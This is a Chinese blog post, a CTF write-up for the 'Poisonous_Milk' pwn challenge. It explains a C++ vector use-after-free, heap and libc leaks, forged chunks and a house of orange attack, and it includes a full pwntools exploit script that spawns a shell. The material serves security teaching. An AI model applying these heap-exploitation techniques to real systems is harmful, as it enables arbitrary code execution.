攻防世界PWN之Poisonous_Milk(认清vector的结构+house of orange利用)

最新推荐文章于 2024-05-19 21:20:24 发布
最新推荐文章于 2024-05-19 21:20:24 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104392845
版权
pwn 同时被 3 个专栏收录
161 篇文章 26 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏

Poisonous_Milk

首先,我们检查一下程序的保护机制

然后,我们用IDA分析一下,发现是c++写的程序,看起来复杂了很多,这些一大堆,作用只是打印菜单,那么我们把这个函数重命名为menu。

接下来,我们进入下一个函数查看,应该就是主功能区了。

为了便于分析,我们给函数重命名了

创建内容的函数里,最多输入86个字符

实际上只能输入85个字符,并且最后一个会被设置为0

接下来,是创建结构体

经过分析,这个结构体这样的

  1. typedef struct milk {  
  2.    char *color;  
  3.    char *content;  
  4. }  

但是,这里初始color时,存在一个漏洞

如果我们输入的color不存在,那么结构体里的color指针就不会初始化,它的值就是其他的值。如果把这个结构体释放后再重新申请回来,如果color不存在,那么color指针就会保存着堆地址。因为这个位置正好对应fastbin的fd。这样,我们就可以泄露堆地址。

现在,我们要弄清楚这个qword_203160到底是什么?

我们发现这个函数极其复杂

先放着,继续分析。

推测这玩意儿,应该是一个vector。我们来看看c++的vector的结构

  1. template<class _Ty,  
  2.     class _Ax>  
  3.     class vector  
  4.         : public _Vector_val<_Ty, _Ax>  
  5.     {   // varying size array of values  
  6. public:  
  7.     /********/  
  8. protected:  
  9.     pointer _Myfirst;   // pointer to beginning of array  
  10.     pointer _Mylast;    // pointer to current end of sequence  
  11.     pointer _Myend; // pointer to end of array  
  12.     };  

那么,我们现在可以确定,这个qword_203160就是一个vector了

  1. typedef struct vector {  
  2.    void *start;  
  3.    void *end;  
  4.    void *capacity;  
  5. }  

为了方便,我们在IDA里重命名一下,现在我们看的清楚了,那个复杂的函数是vector的扩容操作,不用管。每次新增后,插入到end指针的位置,然后end指针向后偏移8字节。

分析后,我们知道了,程序中的存储结构

  1. //存储结构  
  2. vector<milk *> milks;  

然后,我们继续分析,显示功能也没什么漏洞

Delete节点功能,删除一个节点后,vector的end指针做了相应的调整,那么end没有指向释放后的指针,虽然没有清空指针,也用不了UAF。

然后,我们看释放所有节点,以及vector对象本身的函数

注意到,释放vector后,没有把vector指针清零,又因为vector指针是放在bss段,是一个全局变量,其他函数可以使用,这意味着,这个vector本身可以存着UAF漏洞。那么,我们把vector的内存申请回来,就能控制vector里的beginendcapacity三个指针,并且,我们把这些指针指向我们可以控制的区域,然后在可以控制的区域,布置下我们需要读写的地址,这样,我们就能实现任意地址读写操作。但是由于本程序没有edit功能,也就没有写,但是,我们可以伪造chunk,实现任意的free操作。从而利用。

 

那么,我们就开始攻击吧,首先泄露堆地址

  1. #创建一个0x20的头结构体加0x20的存储flags的堆,这样,两个堆释放和属于同一个fastbin,并且头结构体作为头,因为后释放  
  2. create('a'*(0x10-1))  
  3. delete(0)  
  4. #接下来重新申请堆,之前的节点结构体内保存着指针,由于flags堆先申请,所以我们不能申请和之前大小一样的  
  5. #因为我们要让我们这个节点的结构体申请到前一个释放后的节点的结构体内存位置处  
  6. create('b'*0x40)  
  7. #泄露堆地址  
  8. show()  

由于创建时,大小受限制,我们创建不了unsorted bin访问的chunk,因此,我们需要来伪造unsorted bin chunk,然后利用控制vector的begin、end指针,在可控区域布下一个指针指向我们伪造的节点。

  1. #释放了所有的堆,以及vector对象本身  
  2. drink()  
  3. #重新申请到了vector的内存空间,UAF控制vectorbeginend指针  
  4. create(p64(heap_base + 0xE50) + p64(heap_base + 0xE58))  
  5. #这里是用来创建0x20大小的堆,放入fastbin,给以后申请用,这样申请节点结构体时,就不会从我们辛苦得到的unsorted bin里切割  
  6. for i in range(2):  
  7.    create('g'*0x9) #index 2~3  
  8. for i in range(3,1,-1):  
  9.    delete(i)  

需要注意的一点是,我们提前创建了2个content大小为0x20的节点,然后释放,也就是说,在0x20fastbin里有四个chunk,可以提供给后面的申请使用。并且我们是先drink释放了vector,然后才创建的。而不能先创建再drink,因为drink里面,会将我们放到0x20 fastbin的chunk给用掉(调试的时候发现)。之所以在前面先弄几个0x20的fastbin,一方面,是为了缩短contentcontent之间的间隙,方便我们控制,因为如果不这样,节点milk结构体会夹在content与content之间,不方便我们后面的控制。另一方面,是避免申请堆时,从我们辛苦得到的unsorted bin里切割。

上面第二句代码,我们控制了vector的begin和end指针,但是为了不保证出错,我们要确保create时,这个expand扩容操作,不要超过我们begin指针指向的那个位置所属堆的大小,不然扩容到后面的区域我们不可控。导致show的时候出错,因为后面可能有无效地址。

比如我们的begin指针指向了heap_base+0xE50处,而heap_base+0xE50是我们待会申请的某个堆的地址,这个堆,我们最大申请0x60字节,最多写入85个字节,也就是我们最多可以在此处放8个节点指针。扩容超出后,后面的内容我们控制不了,这样show时会导致出错。

这意味着,接下来的操作,我们在没有delete堆前的create操作,最多8次。这完全够用了。

  1. #==============为了得到unsorted binchunk,我们伪造三个chunk===========  
  2. #伪造节点结构体  
  3. payload = p64(0) + p64(0x21)  
  4. #color_ptr          #flags_ptr  
  5. payload += p64(0) + p64(heap_base+0xCD0)  
  6. #伪造flags  
  7. payload += p64(0) + p64(0x101)  
  8. payload = payload.ljust(0x40,'a')  
  9. create(payload) #index2  
  10.   
  11. payload = 'b'*0x30  
  12. payload += p64(0) + p64(0x31)  
  13. payload = payload.ljust(0x50,'b')  
  14. create(payload) #index3  
  15. #payload = 'c'*0x10  
  16. #在后面继续伪造两个堆,绕过堆检查  
  17. payload = p64(0) + p64(0x21)  
  18. payload += 'c'*0x10  
  19. payload += p64(0) + p64(0x31)  
  20. payload = payload.ljust(0x50,'c')  
  21. create(payload) #2  

现在堆伪造好了,我们要释放它,之前我们控制vector的begin指针heap_base+0xE50

因此,我们在heap_base+0xE50放置伪造的节点的地址。当然,还要把其他申请过的节点的地址放过来,这样,我们后续才能继续控制。

而通过精心布局,我们接下来申请一个堆,地址就找heap_base+0xE50处,我们就在这里写入几个节点的地址。

  1. #==================================================================  
  2. #这个堆,我们用来伪造vector的每一项的指针item*,通过控制item*指针,我们就对对需要的节点进行操作  
  3. #伪造item指针  
  4. #0  
  5. payload = p64(heap_base+0xCB0) #fake_chunk node  
  6. #1  
  7. payload += p64(heap_base+0xCB0) #fake_chunk node  
  8. #2  
  9. payload += p64(heap_base+0xC60) #aaaaaaaaaa node  
  10. payload += p64(heap_base+0xD10)   #bbbbbbbbb node  
  11. payload += p64(heap_base+0xD70)   #ccccccccc node  
  12. payload += p64(heap_base+0xD10)   #  
  13. payload += p64(heap_base+0xD70)     #  
  14. payload = payload.ljust(0x50,'c')  
  15. create(payload) #5  

我们在0和1处放置了一模一样的的fake_chunk地址,这样第一次我们delete(0)后,后面的内容上移动,那么我们继续show(0),显示的还是fake_chunk处的内容,这样,我们就能实现UAF。

接下来重点来了

  1. #fastbin与我们伪造生成的unsorted bin重合!!  
  2. delete(3)  
  3. delete(2)  
  4. delete(1)  

我们来看看bins的布局

因为fastbin和unsorted bin里有重合,我们将fastbin的几个chunk申请回来,就能控制unsorted bin里面的内容。这样,我们就能利用house of orange思想来getshell。并且,上面有好几个0x20的bins,用于提供给Milk结构体,而不会从unsorted bin里切割。

  1. #house of orange  
  2. #fake分成2部分,写入  
  3. #执行vtable的函数时,FILE结构体地址被作为参数,因此,我们在最开头写/bin/sh字符串  
  4. fake_file = '/bin/sh\x00' + p64(0x60) #size作为0x60,被放入small_bin,从而对应了chain指针  
  5. #unsorted bin attack,修改_IO_list_allmain_arena+88  
  6. fake_file += p64(0) + p64(_IO_list_all_addr-0x10)  
  7. #_IO_write_base < _IO_write_ptr  
  8. #fake_file += p64(0) + p64(1)  
  9. payload = 'a'*0x20 + fake_file  
  10. create(payload.ljust(0x40,'\x00'))  
  11. #第二部分  
  12. ##vtable指针,同时,也作为fake_vtable__dummy  
  13. fake_file = p64(0) + p64(heap_base + 0xD98)  
  14. #__dummy2__finish  
  15. fake_file += p64(0)*2  
  16. #__overflow  
  17. fake_file += p64(system_addr)  
  18. create(fake_file.ljust(0x50,'\x00'))  
  19.   
  20. #getshell  
  21. sh.sendlineafter('>','p')  
  22. sh.sendlineafter('Input your flags (0-99):','f'*0x40)  

如果getshell失败,可以多试几次,这是由于栈环境的问题。

综上,我们的exp脚本

#coding:utf8
from pwn import *

sh = process('./poisonous_milk')
#sh = remote('111.198.29.45',35825)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
_IO_list_all_s = libc.symbols['_IO_list_all']
system_s = libc.sym['system']

#context.log_level = 'debug'

def create(payload):
   sh.sendlineafter('>','p')
   sh.sendlineafter('Input your flags (0-99):',payload)
   sh.sendlineafter("Input your milk's color:","")

def delete(index):
   sh.sendlineafter('>','r')
   sh.sendlineafter('Give the index :',str(index))

def show():
   sh.sendlineafter('>','v')

def drink():
   sh.sendlineafter('>','d')

#创建一个0x20的头结构体加0x20的存储flags的堆,这样,两个堆释放和属于同一个fastbin,并且头结构体作为头,因为后释放
create('a'*(0x10-1))
delete(0)
#接下来重新申请堆,之前的节点结构体内保存着指针,由于flags堆先申请,所以我们不能申请和之前大小一样的
#因为我们要让我们这个节点的结构体申请到前一个释放后的节点的结构体内存位置处
create('b'*0x40)
#泄露堆地址
show()
sh.recvuntil('[0] [')
heap_addr = u64(sh.recvuntil(']',drop = True).ljust(8,'\x00'))
heap_base = heap_addr - 0xC88
print 'heap_base=',hex(heap_base)
#释放了所有的堆,以及vector对象本身
drink()
#重新申请到了vector的内存空间,UAF控制vector的begin和end指针
create(p64(heap_base + 0xE50) + p64(heap_base + 0xE58))
#这里是用来创建0x20大小的堆,放入fastbin,给以后申请用,这样申请节点结构体时,就不会从我们辛苦得到的unsorted bin里切割
for i in range(2):
   create('g'*0x9) #index 2~3
for i in range(3,1,-1):
   delete(i)

#==============为了得到unsorted bin的chunk,我们伪造三个chunk===========
#伪造节点结构体
payload = p64(0) + p64(0x21)
#color_ptr          #flags_ptr
payload += p64(0) + p64(heap_base+0xCD0)
#伪造flags堆
payload += p64(0) + p64(0x101)
payload = payload.ljust(0x40,'a')
create(payload) #index2

payload = 'b'*0x30
payload += p64(0) + p64(0x31)
payload = payload.ljust(0x50,'b')
create(payload) #index3
#payload = 'c'*0x10
#在后面继续伪造两个堆,绕过堆检查
payload = p64(0) + p64(0x21)
payload += 'c'*0x10
payload += p64(0) + p64(0x31)
payload = payload.ljust(0x50,'c')
create(payload) #2
#==================================================================
#这个堆,我们用来伪造vector的每一项的指针item*,通过控制item*指针,我们就对对需要的节点进行操作
#伪造item指针
#0
payload = p64(heap_base+0xCB0) #fake_chunk node
#1
payload += p64(heap_base+0xCB0) #fake_chunk node
#2
payload += p64(heap_base+0xC60) #aaaaaaaaaa node
payload += p64(heap_base+0xD10)   #bbbbbbbbb node
payload += p64(heap_base+0xD70)   #ccccccccc node
payload += p64(heap_base+0xD10)   #
payload += p64(heap_base+0xD70)     #
payload = payload.ljust(0x50,'c')
create(payload) #5

delete(0)
#泄露main_arena+88地址
show()
sh.recvuntil(']')
sh.recvuntil('] ')
main_arena_88 = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
_IO_list_all_addr = libc_base + _IO_list_all_s
libc_base = _IO_list_all_addr - _IO_list_all_s
system_addr = libc_base + system_s

print 'libc_base=',hex(libc_base)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)
print 'system_addr=',hex(system_addr)
#fastbin与我们伪造生成的unsorted bin重合!!
delete(3)
delete(2)
delete(1)
'''#执行vtable的函数时,FILE结构体地址被作为参数,因此,我们在最开头写/bin/sh字符串
fake_file = '/bin/sh\x00' + p64(0x60) #size作为0x60,被放入small_bin,从而对应了chain指针
#unsorted bin attack,修改_IO_list_all为main_arena+88
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)
#_IO_write_base < _IO_write_ptr
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xC0,'\x00')
fake_file += p64(0)*3
#vtable指针,同时,也作为fake_vtable的__dummy
fake_file += p64(heap_base + 0x5E8)
#__dummy2、__finish
fake_file += p64(0)*2
#__overflow
fake_file += p64(system_addr)
'''
#house of orange
#fake分成2部分,写入
#执行vtable的函数时,FILE结构体地址被作为参数,因此,我们在最开头写/bin/sh字符串
fake_file = '/bin/sh\x00' + p64(0x60) #size作为0x60,被放入small_bin,从而对应了chain指针
#unsorted bin attack,修改_IO_list_all为main_arena+88
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)
#_IO_write_base < _IO_write_ptr
#fake_file += p64(0) + p64(1)
payload = 'a'*0x20 + fake_file
create(payload.ljust(0x40,'\x00'))
#第二部分
##vtable指针,同时,也作为fake_vtable的__dummy
fake_file = p64(0) + p64(heap_base + 0xD98)
#__dummy2、__finish
fake_file += p64(0)*2
#__overflow
fake_file += p64(system_addr)
create(fake_file.ljust(0x50,'\x00'))

#getshell
sh.sendlineafter('>','p')
sh.sendlineafter('Input your flags (0-99):','f'*0x40)

sh.interactive()

 

ha1vk
关注
专栏目录
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1808
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
PWNHouse of Orange&House of Pig(待完整例题)
u014377094的博客
05-06 716
House of Orange House of Orange利用背景在缺少free条件。为了达到free的效果,通过修改top chunk的size位,当malloc的空间大于top chunk时触发brk,使top chunk被放置在unsorted bin。 利用条件: 1.堆有 mmap 和 brk 两种分配方式,我们需要让堆以 brk 的形式拓展,之后原有的 top chunk 会被置于 unsorted bin 中。要实现 brk 拓展 top chunk,但是要实现这个目的需要绕过一.
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 723
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
CTFHub[技能树]-----House of orange
saulgoodman的博客
02-10 254
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
2020DDCTF we_love_free C++ vector
snowleopard_bin的博客
10-07 209
vector的特性扩容特性,1,2,4,8,16......个元素,每次超过阈值,就会将之前的堆块释放,并重新申请大堆块。对应的chunk大小为0x20,0x20,0x50,0x90...... 这题漏洞在于show函数push 0xaabbccdd之后如果vector进行了扩容,就会将之前的chunk释放,但是begin全局变量还是指向原来的堆块,形成UAF漏洞利用方式是覆盖在bss段中的std::cout/std::cin的虚表指针为one_gadget #-*- coding:utf-8.
PWN-COMPETITION-HGAME2022-Week4
P1umH0的博客
02-18 458
PWN-COMPETITION-HGAME2022-Week4vector vector c++写的pwn,实现了vector,没有edit功能,新增了move功能 add或move时,如果输入的下标大于vector的size,vector会进行resize扩容 旧vector占用的chunk自动被free掉进入相应的bin,数据转移到新vector利用add时的vector扩容,free掉size大于0x410的chunk,使其进入unsorted bin,泄露libc 利用move时的vector
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1655
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界pwnhouse_of_grey——Linux系统文件初探
PLpa的博客
03-06 1046
前言: 此题涉及到Linux的两个系统文件:maps和mem,不了解的可以看科普(传送门)。 64位,保护全开,打开IDA64看看程序到底是怎么设计的。 可以看到程序首先打开系统,然后用mmap映射了一片区域,并对fn函数进行操作,我们双击进入fn函数看看情况: fn函数里边又5个功能,没个功能都有用途,分析一下每个功能: 第一个功能从字面意思看就知道是用来定位文件,然后打开他,但是不能打...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
在网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
2020-11-09学习记录:攻防世界pwn之echo_back
eeeeeight的博客
11-09 290
今天就算是世界毁灭,我也要更新博客,容我先睡一觉
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3794
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
2021 bytectf pwn bytezoom
yongbaoii的博客
10-21 1015
保护显然是全开的。 是一道C++的pwn题,c++的pwn分析起来十分复杂,关于堆中chunk的各种分配、释放也非常的麻烦,因为各种对象,各种结构体都会涉及到chunk的申请释放。 我们一点一点分析 首先是功能1,create 因为分两个部分,分别是cat dog,但是里面的内容是一样的,我们就以dog为例就好。 其中我们要注意的首先是string这个结构体。 它的规则是首先申请一个chunk内容为0x10大小的chunk,也就是chunk大小是0x20. 如果我们的输入放不下,就释放这个chunk,.
C++中的virtual与override
weixin_49520696的博客
10-31 1379
当两个或更多的类从同一个基类虚继承时,只有一个基类实例会存在于最终的派生类对象中,从而避免了重复和二义性。纯虚函数是一个在基类中没有定义实现的虚函数。在派生类中,虚函数可以被重写。这允许我们通过基类的指针或引用调用派生类的函数实现,实现动态绑定。如果基类的析构函数是虚的,那么通过基类指针删除派生类对象时,派生类的析构函数也会被正确地调用。:通过纯虚函数,基类可以定义接口,而不提供实现,从而强制派生类提供特定的实现。是C++11引入的一个关键字,用于明确表示派生类中的函数意图覆盖(重写)基类中的虚函数。
2016-HitCon-Pwn-house_of_orange学习(附赠FSOP基础知识)
a2590035252的博客
10-25 680
[md]这里开始著名的house of orange利用方式讲解 house of orange 介绍 House of Orange 与其他的 House of XX 利用方法不同,这种利用方法来自于 Hitcon CTF 2016 中的一道同名题目。由于这种利用方法在此前的 CTF 题目中没有出现过,因此之后出现的一系列衍生题目的利用方法我们称之为 House of Orange。 概述 House of Orange利用比较特殊,首先需要目标漏洞是堆上的漏洞但是特殊之处在于题目中不存在 free
PWN · House_Of_Orange | fastbin-attack】[CISCN 2024 初赛] orange_cat_diary
最新发布
Mr_Fmnwon的博客
05-19 1305
审计一下题目:经典菜单,edit,show,add,delete俱全嗯,啧啧,delete还有个UAF太明显,爽爽unsortedbin-leak-libc!——what!show只能一次,delete只能一次!!!救命。。。我该怎么做。比较惊险,磨了半天,学习house of orange然后利用,居然真的过了。那一刻的高兴至今难忘。
PWN学习-ADworld刷题
WocW的博客
06-04 1637
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
2020NU1LCTF两道pwn
abelxu
10-25 501
Signin 分析 new函数 只能对两个vector进行操作。每次new的数量超过限制时就会申请两倍的空间并把原来的空间释放 unk_2032A0和unk_2032C0的数据结构 struct Node{ void begin;#指向第一个元素,也是堆地址 void now;#指向当前元素 void end;#指向最后一个元素 } show函数 输出Node.now指向的元素 delete函数 并不会检测now指针是否小于begin。多次释放配合show可以泄露堆上的内容。 0x
the house of orange解析
小强的博客
11-24 2265
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
pwn-2019西湖论剑之story
CharlesGodX的博客
04-09 782
0x00:前言 这道题是64位程序,涉及到canary绕过,格式化字符串漏洞,是一道非常好的练习题 0x01:题目思路 首先检查保护,可以看到有堆栈不可执行和canary保护 Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec story [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/story' ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值